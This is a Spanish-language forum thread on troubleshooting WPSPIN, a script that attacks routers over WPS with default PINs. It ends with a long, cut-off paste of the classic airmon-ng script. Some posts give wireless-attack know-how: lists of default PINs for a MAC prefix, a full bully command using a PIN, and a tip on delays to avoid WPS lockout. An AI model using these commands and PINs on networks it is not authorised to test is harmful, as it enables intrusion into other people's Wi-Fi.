El tema es que me he compilado, instalado y probado tanto aircrack-ng como reaver. Ambos funcionan perfecto, incluso las capacidades más avanzadas (como la inserción de paquetes con aireplay-ng). Por tanto supongo que WPSPIN debería funcionar. Sin embargo al ejecutar WPSPIN.sh, me dice: "WARNING: NO COMPATIBLE WIRELESS INTERFACE IS AVAILABLE". Un poco más arriba de este mensaje de aviso, veo que intenta ejecutar el comando "iw" (que no está disponible) y que intenta acceder a /dev/fd/62, /dev/fd/60 y /dev/fd/58 (que no existen) y por último intenta acceder a /tmp/Interface.txt (que tampoco existe).

¿Hay algún modo de solucionar este problema? Por si sirve de algo, el driver WiFi que usa el adaptador de la OpenPandora es el wl1251_sdio.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Agosto 27, 2014, 01:33:22 am
Buenas  :)
Citar
Un poco más arriba de este mensaje de aviso, veo que intenta ejecutar el comando "iw"

el script busca con
Código: [Seleccionar]
iwconfig las interfaces wireless disponibles; si no detecta interfaz ninguna sale esta advertencia.
Generalmente iw viene "de serie" con las distribuciones GNU linux.
Podrias intentar compilar y instalar el paquete iw y esto debria areglar el problema

About iw ( wireless linux - home page )

Citar
Build requirements

    libnl >= libnl1
    libnl-dev >= libnl-dev-1
    pkg-config

Using iw requires you to have libnl, the first working version is 1.0 pre8 as this release introduced genl, Generic Netlink, which nl80211 relies on. If your distribution's libnl is a wrong version then you'll have to download and compile libnl yourself for now

Citar
y que intenta acceder a /dev/fd/62, /dev/fd/60 y /dev/fd/58 (que no existen) y por último intenta acceder a /tmp/Interface.txt (que tampoco existe). 

/tmp/interfaces es un fichero transicional con el resultado de iwconfig, y el fichero no existe porque iw no esta instalado, de ahi estos errores...
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: doragasu en Agosto 29, 2014, 17:54:26 pm
Gracias por la ayuda @kcdtv

La distro que lleva la consola es una Angstrom (una para sistemas empotrados). El comando iwconfig sí que funciona (de hecho lo uso para pasar entre modo monitor y managed). Si iw es necesario, entonces probaré a compilarlo cuando tenga un rato, a ver si con eso se soluciona.

Por ahora probando el script para generar PIN únicamente, y con reaver, he sacado una clave sin problemas, pero tiene pinta de que usar el script para hacer todo, es mucho más cómodo.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: cardi en Septiembre 01, 2014, 15:25:40 pm
wenas chico me he descargado la nueva version de WPSPIN  y tengo un problema he mirado todo el foro y no se si se me he pasado por alto la respuesta.

                     
                     ¡ADVERTENCIA!  WPSPIN EN MODO REDUCIDO

         Debe situarse en el directorio WPSPIN para lanzar el script
   Deje el script en su carpeta de origen sin cambiar el nombre de la carpeta
                            use cd para ubicarse

(http://i.imgur.com/DFZHGGc.png)
(http://i.imgur.com/lFa8tVc.png)
(http://i.imgur.com/WDYB870.png)

gracias por las respuestas.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Coeman76 en Septiembre 01, 2014, 16:04:30 pm
El propio error te lo esta diciendo ;)

No cambies de nombre la carpeta y tu la has renombrado a WPSPIN1

Un saludo
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: cardi en Septiembre 01, 2014, 17:07:10 pm
gracias coeman76 lo tenia delante de mis narices y no era capaz de verlo ya va todo como la espuma gracias.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: marta23 en Septiembre 01, 2014, 17:40:48 pm
una pregunta un poco tonta, pero por las dudas voy hacerla... en el primer post se ven dos descargas una en el servidor  auditoriaswireless (link caido) y la senguda en el servidor  crack-wifi (funciona) , mi pregunta es, la del link caido es la misma actualizacion que la del link que funciona?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Septiembre 01, 2014, 18:36:19 pm

En el 1er post aún se muestra la descarga de la ver 1.4 (enlace no funiconal), el segundo enlace dirige a la respuesta 310 del tema donde se ubican las descargas de la última versión publicada (1.5).

De los tres enlaces solo es funcional el de crackwifi
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: marta23 en Septiembre 01, 2014, 18:41:39 pm
gracias maripuri todo aclarado ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Septiembre 11, 2014, 18:15:53 pm
En cuanto vuelva de los balkanes ( Si me dejan salir  :P  ;D ) areglare esto ( probablamente pondre un vinculo hacia mega en lugar de ubuntu one porque ya no hay mas ubuntu one  :'(  )


Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: andolf en Septiembre 12, 2014, 10:29:43 am
hola:
no me abre el link para descargar la version 1.5. podria poner otro¿ gracias
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Septiembre 12, 2014, 10:44:56 am

Lee tres respuestas antes de la tuya..
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: jorose1987 en Septiembre 28, 2014, 01:35:05 am
¿Existe algún PIN genérico para las 38:72:C0?

Otra cosa, al usar Inflator con esta MAC no prueba ningún PIN ni tampoco se asocia a la red inalámbrica cuando comienza el ataque, ¿a qué es debido? ¿puede ser que aunque el WPS esté activado no haya ningún PIN activado?

Un saludo y gracias.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Septiembre 28, 2014, 02:11:52 am
Citar
¿Existe algún PIN genérico para las 38:72:C0?
sip
usa el modo pin generator (2) para saber lo, poner la mac y te devuelve la información

(http://pix.toile-libre.org/upload/original/1411927572.png)

¡Ojo! Hay varios modelos que comparten este inicio bssid así que no es seguro que te valgan o que se pueda

Que uses inflator o WPSPIN no cambie nada, los dos interactuan con el reaver que tienes en tu sistema.


Citar
¿puede ser que aunque el WPS esté activado no haya ningún PIN activado?

exactamente
(http://pix.toile-libre.org/upload/original/1411862977.png)

Este ocurre con varios dispositivos de varia marcas ( trendnet, tecom, tp-link ) como por ejemplo mi totolink que por defecto es así:

(http://pix.toile-libre.org/upload/original/1411862073.png)

  El WPS no esta desactivado pero tampoco esta activado del todo y no lograras conectarte o obtener el pass.
 
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: USUARIONUEVO en Septiembre 28, 2014, 02:46:47 am
¿Existe algún PIN genérico para las 38:72:C0?

Otra cosa, al usar Inflator con esta MAC no prueba ningún PIN ni tampoco se asocia a la red inalámbrica cuando comienza el ataque, ¿a qué es debido? ¿puede ser que aunque el WPS esté activado no haya ningún PIN activado?

Un saludo y gracias.

yo voto , por que el router esta configurado con seguridad wep ....  :-X
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: jorose1987 en Septiembre 28, 2014, 11:36:24 am
Me lo imaginaba kdctv. Gracias de todas maneras por aclarármelo.

Saludos.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: betis-jesus en Septiembre 28, 2014, 11:50:33 am
que tiene que ver esta pregunta con wpspin de windows
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Septiembre 28, 2014, 14:28:23 pm
Cita de: betis-jesus
que tiene que ver esta pregunta con wpspin de windows

@jorose1987

Hay dos hilos WPSPIN uno para las herramientas de linux y este para las de windows, si vas a hablar acerca de herramientas de linux (inflator) tus dudas en el hilo de linux..   ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: jorose1987 en Septiembre 28, 2014, 15:44:35 pm
@jorose1987

Hay dos hilos WPSPIN uno para las herramientas de linux y este para las de windows, si vas a hablar acerca de herramientas de linux (inflator) tus dudas en el hilo de linux..   ;)

Lo siento maripuri, me equivoqué de sección.

Saludos.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kyrandio en Octubre 01, 2014, 09:35:34 am
No funcionó, una pena, probé estos pins:

10009321
15738370
31348034
18794786
71537573

Para esta mac D8:61:94

Un saludo.

a mi con el ultimo pin si que me fue, solo comentarte que lo probé, (y no quiero desviar el tema) con wifislax 4.7 con el bully en el siguiente comando, mira a ver si te funciona de este modo:

0. (Levantar tu tarjeta).
1.  iwconfig
2. abrir consola y poner: airmon-ng start wlan1,,,o wlan0,,segun cada cual...
3. ahora para ver las redes: airodump-ng mon0 y lo paramos en control mas c.

4. ahora abrimos otra consola y ponemos el siguiente comando:

bully mon0 -b MAC -c 1 -B --force -p 71537573

Nota: -c 1 o el canal que sea....y lo mismo con mon0, o poner mon1,etc... según cada cual.

En 5 segundos me dio la clave.

Prueba si quieres como te he indicado y ya nos dices, ¿ok? es que no quiero desviar más el tema.

Saludos.



WPSPIN para Windows -  default PIN WPS  tienes un tema para wpspin linux.. fijaros un poco donde posteáis por favor.

Lo muevo..

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Octubre 01, 2014, 13:54:09 pm
  locario no parece decir que no ha podido probar los PINes...
...Sino que no eran los buenos.
  No se conocen todos los PINes genéricos para estos modelos
  Para atacar estos routers si no queremos que se active el bloqueo debemos añadir un delay de 12 a nuestra linea de ataque reaver-bully
  En WPSPIN usar el opción en el menú de ataque para personalizar nuestra linea de ataque reaver.
  Una vez obtenido el M6 se puede quitar el delay ya que el bloqueo no se activara.


Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: darkcast en Abril 16, 2015, 18:55:11 pm
Ese script es muy bueno pero personalment me gusto mucho mas la estructura del waidps
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Abril 16, 2015, 19:00:30 pm
No creo que sea muy bueno; pero gracias... ( No soy programador y odio programar  :D )
No conozco waidps... podrías presentarlo en un tema a parte, interesará a muchos   ;)
saludos
PD: este script no pretende ser un modelo o un ejemplo/ ni ser bueno...
ha servido para desvelar un falló que encontré y he deicidio publicar un script de codigo abierto para compartirlo.
No pretendía nada más
PD2
https://github.com/SYWorks/waidps?
no tienen mucho que ver el uno con el otro.,....
pero si : esta muy limpio y el coidgo y muy bien estructurado (es python no bash)
el tio sabe mucho más que y mejor te inspiras de este tipo de codigó que de chapusas como wpspin  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: raz0r en Mayo 20, 2015, 19:47:49 pm
Please help guys this script now doesnt work with Kali Linux because the way airmon-ng works its now been updated to PHY1, please can someone modify this script to get it working again.

PS now its wlan0mon

Many Thanks

Raz0r
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: cadelo en Mayo 20, 2015, 22:26:58 pm
 raz0r

Este es un foro en español, usa un traductor para publicar tus mensajes.

 This is a forum in Spanish , using a translator to post your message
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: raz0r en Mayo 21, 2015, 09:55:38 am
Por favor, ayúdenos chicos este script ahora no funciona con Kali Linux porque la manera airmon -ng se abre ahora han actualizado para pHY1 , por favor alguien puede modificar esta secuencia de comandos para que funcione de nuevo.

PS ahora su wlan0mon

Muchas Gracias

Raz0r
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Mayo 21, 2015, 13:34:21 pm
Personalmente no voy a desarrollar más WPSPIN
...Ahora es codigó libre y si queréis hacerlo vosotr@s; estáis libre...
No te lo aconsejo ya que el código es pesado y mal concebido en muchos aspectos (es mi primer script ;) )

Sino la cosa esta en modificar en la función IFACE() para adaptar el script al "nuevo" airmon-ng (lo que era airmon-zc )
saludos

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: cardi en Junio 05, 2015, 22:36:22 pm
si he escuchado bien por raz0r es que el scrip ya no funciona en kali linux, y por que gracias?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Junio 05, 2015, 23:29:51 pm
El script no funciona si tienes aircrack-ng rc2 (la ultima version) debido al paso de monX a wlanXmon cuando se pone en mode monitor.

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: cardi en Junio 16, 2015, 18:48:09 pm
kcdtv ,se podria quitar aircrack-ng rc2 y instalar la version inferios para que siga funcionando en kali linux?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: landru en Julio 12, 2015, 15:45:22 pm
Hola a todos. Ando detras de saber el pin wps de vodafoneXXXX con mac 64:16:F0 router Huawei HG556
¿sabriais decirme el pin?
Tengo tambien el handshake pero creo que el diccionario seria demasiado largo de probar, ¿alguna ayuda sobre esto tambien?
Muchas gracias.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Julio 12, 2015, 19:20:25 pm
Citar
Hola a todos. Ando detras de saber el pin wps de vodafoneXXXX con mac 64:16:F0 router Huawei HG556
Ese router está soportado por la herramienta.

pd. Te recuerdo que no se dará soporte a la intrusión.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: USUARIONUEVO en Julio 12, 2015, 22:18:37 pm
Los que quieres seguir usandolo , con aircracks nuevos.  EN KALI LINUX

1 - airmon-ng es solo un script , se puede abrir  y mirar editar etc etc etc.

/usr/sbin/airmon-ng

2 - dicho lo anterior , podeis hacer lo siguiente

renombrar vuestro actual script airmon-ng a airmon-zc  que es como se llamo durante todo el desarrollo del nuevo script

y entonces crear un airmon-ng  CLASICO , con el code anterior que dejo a continuacion.


podeis ir jugando , renombrando uno y otro , aunque creo que aun no hay scripts que usen el nuevo airmon-ng (el nuevo no crea interfaces monX si no que juega mas  limpio , pasando directamente wlanX a  wlanXmon)


aunque ahora que pienso ..si quereis volver al airmon por defecto , os basta un

apt-get install aircrack-ng

supongo.


aqui dejo airmon-ng   CLASICO , para que os funcione WPSPIN o cualquier otro script que haga uso del CLASICO

Código: [Seleccionar]
#!/bin/sh

USERID=""
IFACE=""
KISMET=/etc/kismet/kismet.conf
CH=$3; [ x$3 = "x" ] && CH=10
IFACE_FOUND="false"
MADWIFI=0
MAC80211=0
USE_IW=0
IW_SOURCE="https://www.kernel.org/pub/software/network/iw/iw-3.17.tar.xz"
IW_ERROR=""
UDEV_ISSUE=0

if [ -f "`which iw 2>&1`" ]
then
USE_IW=1
fi

if [ "x$MON_PREFIX" = "x" ]
then
MON_PREFIX="mon"
fi

PROCESSES="wpa_action\|wpa_supplicant\|wpa_cli\|dhclient\|ifplugd\|dhcdbd\|dhcpcd\|NetworkManager\|knetworkmanager\|avahi-autoipd\|avahi-daemon\|wlassistant\|wifibox"
PS_ERROR="invalid"

usage() {
printf "usage: `basename $0` <start|stop|check> <interface> [channel or frequency]\n"
echo
exit
}

startStdIface() {
iwconfig $1 mode monitor >/dev/null 2>&1
if [ ! -z $2 ]
then
    if [ $2 -lt 1000 ]
    then
iwconfig $1 channel $2 >/dev/null 2>&1
    else
iwconfig $1 freq "$2"000000 > /dev/null 2>&1
    fi
fi
iwconfig $1 key off >/dev/null 2>&1
ifconfig $1 up
printf " (monitor mode enabled)"
}


stopStdIface() {
ifconfig $1 down >/dev/null 2>&1
iwconfig $1 mode Managed >/dev/null 2>&1
ifconfig $1 down >/dev/null 2>&1
printf " (monitor mode disabled)"
}

getModule() {
    if [ -f "/sys/class/net/$1/device/driver/module/srcversion" ]
    then
        srcver1=`cat "/sys/class/net/$1/device/driver/module/srcversion"`
        for j in `lsmod | awk '{print $1}' | grep -v "^Module$"`
        do
            srcver2="`modinfo $j 2>/dev/null | grep srcversion | awk '{print $2}'`"
            if [ $srcver1 = "$srcver2" ]
            then
                MODULE=$j
                break
            fi
        done
    else
        MODULE=""
    fi
#    return 0
}

getDriver() {
   if [ -e "/sys/class/net/$1/device/driver" ]
   then
       DRIVER="`ls -l "/sys/class/net/$1/device/driver" | sed 's/^.*\/\([a-zA-Z0-9_-]*\)$/\1/'`"
       BUS="`ls -l "/sys/class/net/$1/device/driver" | sed 's/^.*\/\([a-zA-Z0-9_-]*\)\/.*\/.*$/\1/'`"
   else
       DRIVER=""
       BUS=""
   fi
   if [ x$(echo $DRIVER | grep ath5k) != "x" ]
   then
       DRIVER="ath5k"
   fi
   if [ x$(echo $DRIVER | grep ath9k) != "x" ]
   then
       DRIVER="ath9k"
   fi
   if [ x$DRIVER = "x" ]
   then
if [ -d /sys/class/net/tiwlan0/wireless ]
then
DRIVER=WiLink
fi
   fi

}

scanProcesses() {
    if [ -f "`which service 2>&1`" ] && [ x"$1" = "xkill" ]
    then
    service network-manager stop 2>/dev/null >/dev/null
  service avahi-daemon stop 2>/dev/null >/dev/null
    fi

    match=`ps -A -o comm= | grep $PROCESSES | grep -v grep | wc -l`
    if [ $match -gt 0 -a x"$1" != "xkill" ]
    then
        printf "\n\n"
        echo "Found $match processes that could cause trouble."
        echo "If airodump-ng, aireplay-ng or airtun-ng stops working after"
        echo "a short period of time, you may want to kill (some of) them!"
        echo -e "\nPID\tName"
    else
        if [ x"$1" != "xkill" ]
        then
            return
        fi
    fi

    if [ $match -gt 0 -a x"$1" = "xkill" ]
    then
        echo "Killing all those processes..."
    fi

    i=1
    while [ $i -le $match ]
    do
        pid=`ps -A -o pid= -o comm= | grep $PROCESSES | grep -v grep | head -n $i | tail -n 1 | awk '{print $1}'`
        pname=`ps -A -o pid= -o comm= | grep $PROCESSES | grep -v grep | head -n $i | tail -n 1 | awk '{print $2}'`
        if [ x"$1" != "xkill" ]
        then
            printf "$pid\t$pname\n"
        else
            kill $pid
        fi
        i=$(($i+1))
    done
}

checkProcessesIface() {
    if [ x"$1" = "x" ]
    then
        return
    fi

    match2=`ps -o comm= -p 1 2>&1 | grep $PS_ERROR | grep -v grep | wc -l`
    if [ $match2 -gt 0 ]
    then
return
    fi

    for i in `ps auxw | grep $1 | grep -v "grep" | grep -v "airmon-ng" | awk '{print $2}'`
    do
        pname=`ps -o comm= -p $i`
        echo "Process with PID $i ($pname) is running on interface $1"
    done
}

getStack() {
    if [ x"$1" = "x" ]
    then
        return
    fi

    if [ -d /sys/class/net/$1/phy80211/ ]
    then
        MAC80211=1
    else
        MAC80211=0
    fi
}

#you need to run getDriver $iface prior to getChipset
getChipset() {
    if [ x"$1" = "x" ]
    then
        return
    fi

    CHIPSET="Unknown "

    if [ x$DRIVER = "xOtus" -o x$DRIVER = "xarusb_lnx" ]
    then
CHIPSET="AR9001U"
    fi

    if [ x$DRIVER = "xWiLink" ]
    then
CHIPSET=`dmesg | grep TIWLAN | grep CHIP | tail -n 1 | awk -F\  '{ print $6 }'`
    if [ x$CHIPSET = "x" ]
then
CHIPSET="Unknown"
else
CHIPSET="TI${CHIPSET}"
fi
    fi
   
    if [ x$DRIVER = "xar9170usb" ]
    then
    getPhy $2
    CHIPSET="Atheros `dmesg | grep $PHYDEV | grep "is registered as" | cut -d':' -f 2 | cut -d' ' -f 3`"
    fi

    if [ x$DRIVER = "xzd1211rw_mac80211" ]
    then
        CHIPSET="ZyDAS 1211"
    fi

if [ x$DRIVER = "xzd1211rw" ]
    then
        getPhy $2
        TEMP_USBPORT="`dmesg | grep $PHYDEV | grep zd1211rw | cut -d'w' -f 2 | cut -d' ' -f 2`"
        TEMP_CHIPSET="`dmesg | grep "$TEMP_USBPORT" | grep chip | tail -n 1 | cut -d':' -f 3 | cut -d' ' -f 2`"
        CHIPSET="Zydas $TEMP_CHIPSET"
    fi

    if [ x$DRIVER = "xacx" -o x$DRIVER = "xacx-mac80211" -o x$DRIVER = "xacx1xx" ]
    then
        CHIPSET="TI ACX1xx"
    fi

    if [ x$DRIVER = "adm8211" ]
    then
        CHIPSET="ADMtek 8211"
    fi

    if [ x$DRIVER = "xat76_usb" ]
    then
        CHIPSET="Atmel   "
    fi

    if [ x$DRIVER = "xb43" -o x$DRIVER = "xb43legacy" -o x$DRIVER = "xbcm43xx" -o x$DRIVER = "xwl" ]
    then
        CHIPSET="Broadcom"
        if [ x$DRIVER = "xb43" ]
        then
        getPhy $2
        TEMP_CHIPSET="`dmesg | grep $PHYDEV | grep found | cut -d':' -f 2 | cut -d' ' -f 3`"
        if [ x$TEMP_CHIPSET = "x4318" ]
        then
        CHIPSET="$CHIPSET $TEMP_CHIPSET"
        fi
        fi
    fi

    if [ x$DRIVER = "xprism54" -o x$DRIVER = "xp54pci" -o x$DRIVER = "xp54usb" ]
    then
        CHIPSET="PrismGT "
    fi

    if [ x$DRIVER = "xhostap" ]
    then
        CHIPSET="Prism 2/2.5/3"
    fi

    if [ x$DRIVER = "xr8180" -o x$DRIVER = "xrtl8180" ]
    then
        CHIPSET="RTL8180/RTL8185"
    fi

    # r8187 is reporting itself as rtl8187
    if [ x$DRIVER = "xrtl8187" ]
    then
        getPhy $2
       if [ x"$PHYDEV" = "x" ]
       then
               CHIPSET="RTL8187 "
       else
               CHIPSET="`dmesg | grep $PHYDEV | grep hwaddr | cut -d',' -f 2 | cut -d' ' -f 2`"
               if [ x$CHIPSET = "xRTL8187vB" ]
               then
                       CHIPSET="Realtek RTL8187L"
               else
                       CHIPSET="Realtek $CHIPSET"
               fi
       fi
    fi
   
    if [ x$DRIVER = "xr8187" ]
    then
        CHIPSET="RTL8187 "
    fi

    if [ x$DRIVER = "xrt2570" -o x$DRIVER = "xrt2500usb" ]
    then
        CHIPSET="Ralink 2570 USB"
    fi

    if [ x$DRIVER = "xrt2400" -o x$DRIVER = "xrt2400pci" ]
    then
        CHIPSET="Ralink 2400 PCI"
    fi

    if [ x$DRIVER = "xrt2500" -o x$DRIVER = "xrt2500pci" ]
    then
        CHIPSET="Ralink 2560 PCI"
    fi

    if [ x$DRIVER = "xrt61" -o x$DRIVER = "xrt61pci" ]
    then
        CHIPSET="Ralink 2561 PCI"
    fi

    if [ x$DRIVER = "xrt73" -o x$DRIVER = "xrt73usb" ]
    then
        CHIPSET="Ralink 2573 USB"
    fi

#if [ x$DRIVER = "xrt2800usb" ]
#then
# getPhy $2
# CHIPSET="Ralink `dmesg | grep rt2800usb | grep firmware | cut -d':' -f 4 | cut -d' ' -f 3 | cut -d'.' -f 1`"
#fi

    if [ x$DRIVER = "xrt2800" -o x$DRIVER = "xrt2800usb" -o x$DRIVER = "xrt3070sta" ]
    then
        CHIPSET="Ralink RT2870/3070"
    fi

    if [ x$DRIVER = "xipw2100" ]
    then
        CHIPSET="Intel 2100B"
    fi

    if [ x$DRIVER = "xipw2200" ]
    then
        CHIPSET="Intel 2200BG/2915ABG"
    fi

    if [ x$DRIVER = "xipw3945" -o x$DRIVER = "xipwraw" -o x$DRIVER = "xiwl3945" ]
    then
        CHIPSET="Intel 3945ABG"
    fi

    if [ x$DRIVER = "xipw4965" -o x$DRIVER = "xiwl4965" ]
    then
        CHIPSET="Intel 4965AGN"
    fi

    if [ x$DRIVER = "xiwlagn" -o x$DRIVER = "xiwlwifi" ]
    then
        CHIPSET="Intel 4965/5xxx/6xxx/1xxx"
       
        DETECTED_STR="`dmesg | grep $DRIVER | grep Detected | tail -n 1 `"
        LINK_POS="3"
        FOUND="0"
       
        if [ x"$DETECTED_STR" != "x" ]
        then
        INTEL_WORD="Link"
        if [ "`echo "$DETECTED_STR" | grep $INTEL_WORD | wc -l`" = "0" ]
        then
        INTEL_WORD="Wireless"
        if [ "`echo "$DETECTED_STR" | grep $INTEL_WORD | wc -l`" = "0" ]
then
INTEL_WORD="Ultimate"
        if [ "`echo "$DETECTED_STR" | grep $INTEL_WORD | wc -l`" = "0" ]
then
INTEL_WORD="Advanced"
        fi
fi
        fi
       
        while [ $FOUND = "0" ]
do
FOUND=`echo "$DETECTED_STR" | cut -d' ' -f $LINK_POS | grep $INTEL_WORD | wc -l`
LINK_POS=$(($LINK_POS+1))
done

TEMP_CHIPSET=`echo "$DETECTED_STR" | cut -d' ' -f $LINK_POS`

case "x${TEMP_CHIPSET}" in
#               x5100AGN)
#                       CHIPSET="Intel $TEMP_CHIPSET"
#                       ;;
x5300)
TYPE_TEMP=`echo "$DETECTED_STR" | cut -d' ' -f $(($LINK_POS+1)) | awk -F, '{ print $1 }' `
CHIPSET="Intel ${TEMP_CHIPSET}${TYPE_TEMP}"
;;
x1000)
TYPE_TEMP=`echo "$DETECTED_STR" | cut -d' ' -f $[$LINK_POS+2]`
CHIPSET="Intel ${TEMP_CHIPSET}${TYPE_TEMP}"
;;
*)
CHIPSET="Intel $TEMP_CHIPSET"
;;
esac
        fi

    fi

if [ x$DRIVER = "xath5k" ]
then
getPhy $2
CHIPSET="Atheros `dmesg | grep $PHYDEV | grep "chip found" | cut -d':' -f 2 | cut -d' ' -f 3`"
fi

    if [ x$DRIVER = "xath_pci" ]
    then
        CHIPSET="Atheros "
    fi
   
    if [ x$DRIVER = "xath9k" ]
    then
    getPhy $2
    CHIPSET="Atheros `dmesg | grep $PHYDEV | grep Atheros | tail -n 1 | cut -d':' -f 2 | cut -d' ' -f 3`"
    fi

    if [ x$DRIVER = "xorinoco" ]
    then
        CHIPSET="Hermes/Prism"
    fi
   
    if [ x$DRIVER = "xath9k_htc" -o x$DRIVER = "xusb" ]
    then
        CHIPSET="AR9001/9002/9271"
    fi
   
    if [ x$DRIVER = "xwl12xx" ]
    then
            CHIPSET="TI WL1251/WL1271"
            IS_WL1251="`dmesg| grep firmware | grep wl1251 | wc -l`"
            IS_WL1271="`dmesg| grep firmware | grep wl1271 | wc -l`"

            if [ $IS_WL1251 != "0" ] && [ $IS_WL1271 = "0" ]
            then
                CHIPSET="TI WL1251"
            fi
            if [ $IS_WL1271 != "0" ] && [ $IS_WL1251 = "0" ]
            then
                CHIPSET="TI WL1271"
            fi
            # In any other case, we can't determine the chipset and thus give the generic: 1251/1271
    fi
   
   
    if [ x$DRIVER = "xr871x_usb_drv" ]
    then
            CHIPSET="Realtek 81XX"
    fi
   
    if [ x$DRIVER = "xcarl9170" ]
    then
            getPhy $2
            CHIPSET=`dmesg | grep usb | grep $PHYDEV | awk -F\  '{ print $3 " " $4 }'`
    if [ `echo $CHIPSET | grep -i atheros | wc -l` -eq 0 ]
    then
CHIPSET=`dmesg | grep usb | grep $PHYDEV | awk -F\  '{ print $5 " " $6 }'`
    fi
    fi
}

getPhy() {
    PHYDEV=""
    if [ x"$1" = "x" ]
    then
        return
    fi

    if [ x$MAC80211 = "x" ]
    then
        return
    fi

    if [ -d /sys/class/net/$1/phy80211/ ]
    then
PHYDEV="`ls -l "/sys/class/net/$1/phy80211" | sed 's/^.*\/\([a-zA-Z0-9_-]*\)$/\1/'`"
    fi
}

getNewMon() {
    i=0

    while [ -d /sys/class/net/$MON_PREFIX$i/ ]
    do
        i=$(($i+1))
    done

    MONDEV="$MON_PREFIX$i"
}

if [ x"`which id 2> /dev/null`" != "x" ]
then
USERID="`id -u 2> /dev/null`"
fi

if [ x$USERID = "x" -a x$UID != "x" ]
then
USERID=$UID
fi

if [ x$USERID != "x" -a x$USERID != "x0" ]
then
echo Run it as root ; exit ;
fi

iwpriv > /dev/null 2> /dev/null ||
  { echo Wireless tools not found ; exit ; }

if [ x"$1" = "xcheck" ] || [ x"$1" = "xstart" ]
then
    scanProcesses
    for iface in `iwconfig 2>/dev/null | egrep '(IEEE|ESSID|802\.11|WLAN)' | sed 's/^\([a-zA-Z0-9_.]*\) .*/\1/' | grep -v wifi`
    do
#         getModule $iface
#         getDriver $iface
        checkProcessesIface $iface
    done

    if [ x"$2" = "xkill" ]
    then
        scanProcesses "$2"
    fi
    if [ x"$1" = "xcheck" ]
    then
        exit
    fi
fi

printf "\n\n"

if [ $# -ne "0" ]
then
    if [ x$1 != "xstart" ] && [ x$1 != "xstop" ]
    then
        usage
    fi

    if [ x$2 = "x" ]
    then
        usage
    fi
fi

SYSFS=0
if [ -d /sys/ ]
then
    SYSFS=1
fi

printf "Interface\tChipset\t\tDriver\n\n"


for iface in `ifconfig -a 2>/dev/null | egrep UNSPEC | sed 's/^\([a-zA-Z0-9_]*\) .*/\1/'`
do

 if [ x"`iwpriv $iface 2>/dev/null | grep ipwraw-ng`" != "x" ]
 then
        printf "$iface\t\tIntel 3945ABG\tipwraw-ng"
        if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
        then
                cp $KISMET~ $KISMET 2>/dev/null &&
                echo "source=ipw3945,$iface,Centrino_abg" >>$KISMET
                startStdIface $iface $CH
                iwconfig $iface rate 1M 2> /dev/null >/dev/null
                iwconfig $iface txpower 16 2> /dev/null >/dev/null
        fi
        if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
        then
                stopStdIface $iface
                iwconfig $iface txpower 15 2> /dev/null >/dev/null
                iwconfig $iface rate 54M 2> /dev/null >/dev/null
        fi
        echo
        continue
 fi

 if [ -e "/proc/sys/dev/$iface/fftxqmin" ]
 then
    MADWIFI=1
    ifconfig $iface up
    printf "$iface\t\tAtheros\t\tmadwifi-ng"
    if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
    then
        IFACE=`wlanconfig ath create wlandev $iface wlanmode monitor -bssid | grep ath`
        cp $KISMET~ $KISMET 2>/dev/null &&
        echo "source=madwifi_g,$iface,Atheros" >>$KISMET
        ifconfig $iface up 2>/dev/null >/dev/null
        if [ $CH -lt 1000 ]
        then
            iwconfig $IFACE channel $CH 2>/dev/null >/dev/null
        else
            iwconfig $IFACE freq "$CH"000000 2>/dev/null >/dev/null
        fi
